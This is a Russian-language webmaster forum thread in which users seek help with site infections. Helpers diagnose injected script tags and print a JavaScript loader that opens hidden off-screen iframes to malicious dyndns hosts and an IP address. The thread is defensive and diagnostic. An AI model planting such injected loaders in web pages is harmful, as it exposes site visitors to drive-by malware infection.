Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Компьютеры + Интернет » Вебмастеру » Вирус на сайте, нужна помощь

Ответить
Настройки темы
Вирус на сайте, нужна помощь

Аватара для ][alter

Старожил


Сообщения: 195
Благодарности: 15

Профиль | Сайт | Отправить PM | Цитировать


Изменения
Автор: Sham
Дата: 06-09-2011
Добрый вечер. Сегодня после обеда заметил неприятную особенность на сайте. Постоянно ругается антивирус на разные адреса, так же видно что подвал сайта нарушен. Но тела вируса найти мне не удалось (( Помогите пожалуйста решить проблему, где найти тело вируса и как это лечится ? Сайт unechanews.ru

-------
Если хочешь научиться плавать, прыгай в воду. Находясь на суше, никакой умонастрой тебе не поможет.


Отправлено: 21:59, 05-09-2011

 

Аватара для Delirium

Ветеран


Сообщения: 5624
Благодарности: 936

Профиль | Отправить PM | Цитировать


][alter, не вижу проблемы... На сайт не ругается, подвал вроде бы в порядке... А лечится это, как и обычные вирусы - антивирусом. Приведи скрин "ругания" антивируса.

-------

Пройденные курсы:
[Microsoft №10174 Sharepoint], [SharePoint]
Мои проекты:[CheckAdmins], [NetSend7], [System Uptime], [Remote RAdmin LogViewer],[Netdom GDI], [Holidays - напоминалка о днях рождения]

А я офис-гуру :)


Отправлено: 01:09, 06-09-2011 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Deadooshka


Сообщения: 2512
Благодарности: 690

Профиль | Отправить PM | Цитировать


][alter, приведите подробности, а то будет бан по п. 3.4

Отправлено: 08:37, 06-09-2011 | #3


Аватара для ][alter

Старожил


Сообщения: 195
Благодарности: 15

Профиль | Сайт | Отправить PM | Цитировать


Сегодня я уже попал в под фильтр оперы ((.

В подвале явно что то чужеродное так как он сломан.

Но я не могу найти где что ((


Скрины:

http://imageshack.us/photo/my-images/171/83474025.jpg/

http://imageshack.us/photo/my-images/823/63180071.jpg/

На работе сегодня антивирус не ругается. Буду дома проверю как там дела обстоят.

-------
Если хочешь научиться плавать, прыгай в воду. Находясь на суше, никакой умонастрой тебе не поможет.


Отправлено: 09:12, 06-09-2011 | #4


В Поисках Истины


Сообщения: 802
Благодарности: 135

Профиль | Отправить PM | Цитировать


При заходе на сайт, антивирус NOD, находит угрозу HTML/iframe.B.Gen.

-------
foreach(short w in new short[] {73,3,79,83,90,79,78,69}){
Console.Write((char)w);
}


Отправлено: 10:08, 06-09-2011 | #5


Аватара для ][alter

Старожил


Сообщения: 195
Благодарности: 15

Профиль | Сайт | Отправить PM | Цитировать


Да у меня именно nod32 ругается. Как с этим бороться и самое главное как туда это попало?

-------
Если хочешь научиться плавать, прыгай в воду. Находясь на суше, никакой умонастрой тебе не поможет.


Отправлено: 10:12, 06-09-2011 | #6


Deadooshka


Сообщения: 2512
Благодарности: 690

Профиль | Отправить PM | Цитировать


в DOM нашел это
Код: Выделить весь код
<script src="http://u4a.dyndns.tv/followbb.php?i=19703" language="JavaScript">
Reload the page to get source for: http://u4a.dyndns.tv/followbb.php?i=19703
</script>
грузит это
Код: Выделить весь код
var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://sell00.dyndns-ip.com/main.php?page=7f8d1ec15718a56f'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://178.63.96.144/?rbb'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://u4a.dyndns.tv/?inid=19703&intime=657645061'; document.body.appendChild(frame);
смотрите в скриптах, шаблонах, флешках и т.д.

в шаблоне он просто
Код: Выделить весь код
<script language='JavaScript' src='http://u4a.dyndns.tv/followbb.php?i=19703'></script>
тот код я с фаербага скопировал (лишний текст)...

Проблема не столько в самом ифрейме, сколько в возможности добавить что угодно в шаблон. Смотрите дыры в движке и исправляйте, иначе потеряете данные.
Это сообщение посчитали полезным следующие участники:

Отправлено: 10:17, 06-09-2011 | #7


Аватара для ][alter

Старожил


Сообщения: 195
Благодарности: 15

Профиль | Сайт | Отправить PM | Цитировать


Нашел в index.php.

Цитата:
Проблема не столько в самом ифрейме, сколько в возможности добавить что угодно в шаблон. Смотрите дыры в движке и исправляйте, иначе потеряете данные.
Уже пропадали полностью данные с базы данных, приходилось восстанавливать из бекапа.

-------
Если хочешь научиться плавать, прыгай в воду. Находясь на суше, никакой умонастрой тебе не поможет.


Отправлено: 11:14, 06-09-2011 | #8


Новый участник


Сообщения: 25
Благодарности: 0

Профиль | Отправить PM | Цитировать


Учитывая что мне уже неплохо помогли на озоне, снова обращаюсь за помощью.
Мое почтение Уважаемые знатоки! Сегодня мне пришло сообщение от Яндекса, что у меня вирус на сайте.
Проверял сайт на вирус тотале, все по нолям.
Решил сам просмотреть через IE HTML своей страницы и обнаружил такую вещь.
Цитата:
<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="#" xml:lang="ru" lang="ru">
<link rel="stylesheet" type="text/css" href="/templates/Zevs/css/menu.css"/>
<head>
<div style='z-index:1000; position: fixed; top:90%; right:0px'>
<SCRIPT Language="javascript">
Вот эта хрень и определяется как вирус http://wildfuckers.dyndns.ws/showforum.php?pid=54543
Подскажите пожалуйста, исходя из приведенного куска кода, где мне искать эту падлюку. Сам увы найти не могу.
Помогите пожалуйста!
Могу в случае необходимости залить куда нибуть весь код.
PS Методом тыка выяснилось, что этот код видно,только когда заходишь на сайт без логина своего. Просто как посетитель без аккаунта.

Последний раз редактировалось Gudzon2, 10-03-2013 в 13:13.


Отправлено: 12:52, 10-03-2013 | #9


Ветеран


Сообщения: 3487
Благодарности: 507

Профиль | Сайт | Отправить PM | Цитировать


<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script>
Это.
Гугли по этому коду.
Ищи ошибки в модулях CMS.
Прикрывай дырку.

-------
Просьба обращаться на "ты".


Последний раз редактировалось Severny, 10-03-2013 в 13:35.


Отправлено: 13:28, 10-03-2013 | #10



Компьютерный форум OSzone.net » Компьютеры + Интернет » Вебмастеру » Вирус на сайте, нужна помощь

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
очень нужна ваша помощь. возможно ВИРУС kcenij Лечение систем от вредоносных программ 1 26-05-2010 13:28
Вирус Кидо. Срочно нужна помощь! комикс Лечение систем от вредоносных программ 13 31-01-2010 20:50
Наверно вирус или троян на сайте AACC Лечение систем от вредоносных программ 6 23-09-2009 13:45
[решено] Вирус на сайте. (с) Касперский Artem-Samsung Вебмастеру 8 27-02-2009 23:02
Вирус Нужна помщь region Лечение систем от вредоносных программ 1 29-02-2008 10:13




 
Переход